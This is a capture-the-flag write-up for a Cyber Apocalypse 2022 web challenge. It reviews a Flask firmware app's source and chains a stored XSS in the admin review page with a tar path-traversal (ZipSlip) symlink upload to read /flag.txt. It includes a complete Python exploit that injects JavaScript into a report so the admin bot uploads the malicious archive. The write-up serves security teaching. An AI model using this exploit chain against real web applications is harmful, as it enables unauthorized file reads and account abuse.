B-XSS -> ZipSlip -> Local File Read

As usual, I got some time to play CTFs and decided to join my Team, TamilCTF, to play Cyber Apocalypse CTF 2022 (organized by HackTheBox). Let’s see a solution for one of the web challenges I solved during the event that I found interesting.
Introduction
- The following screenshot shows how the web app looks like:

- We are provided with the source code, and the following screenshot shows the source code structure:

Report:
- The following screenshot shows that the app has a reporting feature. It also has a bot. So, we need an XSS:

Source Code:
database.py (nothing super interesting — you can skip if you want)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy_serializer import SerializerMixin
from flask_login import UserMixin
from flask import current_app
db = SQLAlchemy()
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100))
class Firmware(db.Model, UserMixin, SerializerMixin):
id = db.Column(db.Integer, primary_key=True)
module = db.Column(db.String(100))
hw_version = db.Column(db.String(100))
fw_version = db.Column(db.String(100))
serial = db.Column(db.String(100))
hub_id = db.Column(db.String(100))
class Report(db.Model, UserMixin, SerializerMixin):
id = db.Column(db.Integer, primary_key=True)
module_id = db.Column(db.Integer)
reported_by = db.Column(db.String(100))
issue = db.Column(db.Text)
def clear_reports():
db.session.query(Report).delete()
db.session.commit()
def clear_db():
meta = db.metadata
for table in reversed(meta.sorted_tables):
db.session.execute(table.delete())
db.session.commit()
def migrate_db():
clear_db()
# admin user
db.session.add(User(id=1, username=current_app.config['ADMIN_USERNAME'], password=current_app.config['ADMIN_PASSWORD']))
# firmwares
db.session.add(Firmware(id=1, module='Launch pod interface', hw_version='d3', fw_version='2408.b', serial='c6c3b20e', hub_id='17310'))
db.session.add(Firmware(id=2, module='Oxidizer controller', hw_version='a4', fw_version='1801.c', serial='b20418fc', hub_id='33194'))
db.session.add(Firmware(id=3, module='Propellant damper', hw_version='b6', fw_version='1705.e', serial='7fdee87d', hub_id='19696'))
db.session.add(Firmware(id=4, module='RD-983 compressor', hw_version='a1', fw_version='0002.a', serial='b0dae2e3', hub_id='91284'))
db.session.add(Firmware(id=5, module='Refinery interface', hw_version='g4', fw_version='4323.d', serial='d0f2798d', hub_id='31157'))
db.session.add(Firmware(id=6, module='Condensation chamber', hw_version='k3', fw_version='3467.p', serial='2e1e7897', hub_id='19850'))
db.session.add(Firmware(id=7, module='Fission reactor', hw_version='p3', fw_version='9031.g', serial='9c431d03', hub_id='12488'))
db.session.add(Firmware(id=8, module='Booster core', hw_version='i7', fw_version='7651.g', serial='cd003b79', hub_id='12488'))
db.session.add(Firmware(id=9, module='Surface calibrator', hw_version='a1', fw_version='4632.g', serial='b320babd', hub_id='14274'))
db.session.add(Firmware(id=10, module='Nozzle controller', hw_version='f6', fw_version='8731.g', serial='8be939d9', hub_id='78804'))
db.session.commit()
routes.py
import json
from application.database import User, Firmware, Report, db, migrate_db
from application.util import is_admin, extract_firmware
from flask import Blueprint, jsonify, redirect, render_template, request
from flask_login import current_user, login_required, login_user, logout_user
from application.bot import visit_report
web = Blueprint('web', __name__)
api = Blueprint('api', __name__)
def response(message):
return jsonify({'message': message})
@web.route('/', methods=['GET'])
def login():
return render_template('login.html')
@api.route('/login', methods=['POST'])
def user_login():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if not user or not user.password == password:
return response('Invalid username or password!'), 403
login_user(user)
return response('User authenticated successfully!')
@web.route('/register', methods=['GET'])
def register():
return render_template('register.html')
@api.route('/register', methods=['POST'])
def user_registration():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if user:
return response('User already exists!'), 401
new_user = User(username=username, password=password)
db.session.add(new_user)
db.session.commit()
return response('User registered successfully!')
@web.route('/dashboard')
@login_required
def dashboard():
return render_template('dashboard.html')
@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
firmware_list = Firmware.query.all()
return jsonify([row.to_dict() for row in firmware_list])
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
module_id = data.get('module_id', '')
issue = data.get('issue', '')
if not module_id or not issue:
return response('Missing required parameters!'), 401
new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
db.session.add(new_report)
db.session.commit()
visit_report()
migrate_db()
return response('Issue reported successfully!')
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
if 'file' not in request.files:
return response('Missing required parameters!'), 401
extraction = extract_firmware(request.files['file'])
if extraction:
return response('Firmware update initialized successfully.')
return response('Something went wrong, please try again!'), 403
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
Reports = Report.query.all()
return render_template('review.html', reports=Reports)
@web.route('/logout')
@login_required
def logout():
logout_user()
return redirect('/')
The
@login_requiredmiddleware checks if the user is authenticated.The
@is_adminmiddleware checks if the user is an administrator. The following snippet shows the@is_adminmiddleware function code. Note that the check is just the username, and the IP address. It checks if the username is equals to the admin’s username that is configured in the app, and it checks if the IP address if127.0.0.1.
def is_admin(f):
@functools.wraps(f)
def wrap(*args, **kwargs):
if current_user.username == current_app.config['ADMIN_USERNAME'] and request.remote_addr == '127.0.0.1':
return f(*args, **kwargs)
else:
return abort(401)
return wrap
Api Routes:
- The
/api/registerroute handles register user functionality:
@api.route('/register', methods=['POST'])
def user_registration():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if user:
return response('User already exists!'), 401
new_user = User(username=username, password=password)
db.session.add(new_user)
db.session.commit()
return response('User registered successfully!')
@web.route('/dashboard')
- The
/api/loginroute handles login functionality:
@api.route('/login', methods=['POST'])
def user_login():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
username = data.get('username', '')
password = data.get('password', '')
if not username or not password:
return response('Missing required parameters!'), 401
user = User.query.filter_by(username=username).first()
if not user or not user.password == password:
return response('Invalid username or password!'), 403
login_user(user)
return response('User authenticated successfully!')
/api/firmware/reportroute handles the Report from user and saves it in the database.visit_report()is the function that is called to make the bot view the submitted report.migrate_db()is the function which clear the clear the database (report column).
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
if not request.is_json:
return response('Missing required parameters!'), 401
data = request.get_json()
module_id = data.get('module_id', '')
issue = data.get('issue', '')
if not module_id or not issue:
return response('Missing required parameters!'), 401
new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
db.session.add(new_report)
db.session.commit()
visit_report()
migrate_db()
return response('Issue reported successfully!')
- The following snippet shows that code handling the
/api/firmware/uploadroute. This can be used to upload files. Note that both the@login_requiredand@is_adminare set — Meaning, only admin can upload files.
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
if 'file' not in request.files:
return response('Missing required parameters!'), 401
extraction = extract_firmware(request.files['file'])
if extraction:
return response('Firmware update initialized successfully.')
return response('Something went wrong, please try again!'), 403
- The
extract_firmware()function is called to extract the uploaded file, and the following snippet shows the code regarding this:
def extract_firmware(file):
tmp = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
if tarfile.is_tarfile(path):
tar = tarfile.open(path, 'r:gz')
tar.extractall(tmp)
rand_dir = generate(15)
extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
os.makedirs(extractdir, exist_ok=True)
for tarinfo in tar:
name = tarinfo.name
if tarinfo.isreg():
try:
filename = f'{extractdir}/{name}'
os.rename(os.path.join(tmp, name), filename)
continue
except:
pass
os.makedirs(f'{extractdir}/{name}', exist_ok=True)
tar.close()
return True
return False
- As observed, at first, the uploaded files are stored in the
/tmpand variablepathhold the name of thefilewithpath. For example, if a file with a namemyfile.tag.gzis uploaded, then it will be stored in the/tmp/myfile.tar.gzdirectory.
tmp = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
- Before extracting the saved tar file, it first checks if it is a valid tar file, and if so, it unpacks it and stored it, as shown in the following snippet:
if tarfile.is_tarfile(path):
tar = tarfile.open(path, 'r:gz')
tar.extractall(tmp)
Furthermore, the following snippet shows a loop that checks if the extracted files are normal files, or a different file like a symlink file.
If the extracted files are valid files, then the files are moved to the
/app/application/static/firmware/[random_number]directory, which is the application’s static directory — Meaning, we can access the files in this directory from the web application. However, we need to know the value of the[random_number]. If we can leak the[random_number], then we can read files uploaded to the server.If the extracted files are not normal/valid files, then the files are removed from the
/tmpdirectory, and are not moved to/staticdirectory:
for tarinfo in tar:
name = tarinfo.name
if tarinfo.isreg():
try:
filename = f'{extractdir}/{name}'
os.rename(os.path.join(tmp, name), filename)
continue
except:
pass
os.makedirs(f'{extractdir}/{name}', exist_ok=True)
tar.close()
- The
/reviewendpoint can handleGETmethod, where the reports are rendered in the URL. Additionally, onlyAdminuser can access this route, as shown in the following snippet:
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
Reports = Report.query.all()
return render_template('review.html', reports=Reports)
Review.html
- In
Review.html, the user input is not sanitized before rendered. As a result, we have an XSS here!
<div class="card-header"> Reported by : USER
</div>
<div class="card-body">
<p class="card-title">Module ID : {{ report.module_id }}</p>
<p class="card-text">Issue : {{ report.issue | safe }} </p>
<a href="#" class="btn btn-primary">Reply</a>
<a href="#" class="btn btn-danger">Delete</a>
</div>
Exploit Idea:
Now we have an XSS. However, session cookies are set to
HTTPOnly. So, we can’t use JavaScript to read it. However, we can still use the cookie using JavaScript without reading it. Regardless, even if we were able to exfiltrate the session cookie, we can’t access the admin endpoints, since the source IP of the request should be equal to127.0.0.1.With this blind XSS, we can force the bot user to upload a malicious
tarfile using the/api/firmware/uploadendpoint.There is a well-known vulnerability called
ZipSlip, which allow us to pack files into tar or zip files, which are path traversal’d when the file is file is unpacked.We can creating a
symlinkfile that pointing to/flag.txtand using Zipslip vulnerability to traversal the extracted files to be stored in the application’s static directory. Since the check to make sure that the files are normal files only happen in the/tmpdirectory, where the files are initially extracted, our traversal’d file will not be caught.Note: By traversing the extracted files to
/app/applicaition/staticdirectory will help us to bypass thetarinfo.isreg()function.
Exploit:
- To automate this, I wrote a python script:
import requests
import os
import random
import string
import tarfile
letters = string.ascii_lowercase
randomText= ''.join(random.choice(letters) for i in range(10))
url = 'http://localhost:1337'
def registerUser(username, password):
r = requests.post(url + '/api/register', json={"username":username,"password":password})
if r.status_code != 200:
print(r.text)
exit()
def loginUser(username, password):
r = requests.post(url + '/api/login', json={"username":username,"password":password})
if r.status_code != 200:
print(r.text)
exit()
session = r.headers['Set-Cookie'].split(';')[0].split('=')[1]
global cookies
cookies = {
'session':session
}
r = requests.get(url + '/dashboard', cookies=cookies)
def makeTar():
os.system(f'mkdir ../app')
os.system(f'mkdir ../app/application/')
os.system(f'mkdir ../app/application/static')
os.system('ln -s /flag.txt getflag.txt; mv getflag.txt ../app/application/static/')
tar = tarfile.open('exp.tar','w')
tar.add('../app/application/static/getflag.txt')
tar.close()
os.system('gzip exp.tar')
os.system('rm -rf ../app')
def js():
string = os.popen('cat exp.tar.gz | base64 -w0')
os.system('rm -rf exp.tar.gz')
b64String = string.read()
global js
js = """
<script>
function base64toBlob(base64Data, contentType) {
contentType = contentType || '';
var sliceSize = 1024;
var byteCharacters = atob(base64Data);
var bytesLength = byteCharacters.length;
var slicesCount = Math.ceil(bytesLength / sliceSize);
var byteArrays = new Array(slicesCount);
for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
var begin = sliceIndex * sliceSize;
var end = Math.min(begin + sliceSize, bytesLength);
var bytes = new Array(end - begin);
for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
bytes[i] = byteCharacters[offset].charCodeAt(0);
}
byteArrays[sliceIndex] = new Uint8Array(bytes);
}
return new Blob(byteArrays, { type: contentType });
}
var b64file = """+f"'{b64String}'"+""";
var content_type = 'application/x-gtar-compressed';
var blob = base64toBlob(b64file, content_type);
var formData = new FormData();
formData.append('file', blob,'abcd');
var url = 'http://localhost:1337/api/firmware/upload';
var request = new XMLHttpRequest();
request.withCredentials = true;
request.open('POST', url);
request.send(formData);
</script>
"""
def report():
r = requests.post(url + '/api/firmware/report', cookies=cookies, json={"module_id": "1", "issue": f"{js}"})
if r.status_code != 200:
print(r.text)
exit()
def getflag():
r = requests.get(url+'/static/getflag.txt')
print(r.text.strip())
exit()
def main():
registerUser(randomText,randomText)
loginUser(randomText, randomText)
makeTar()
js()
report()
getflag()
if __name__ == "__main__":
main()
- Running it, we get the flag, as shown in the following screenshot:




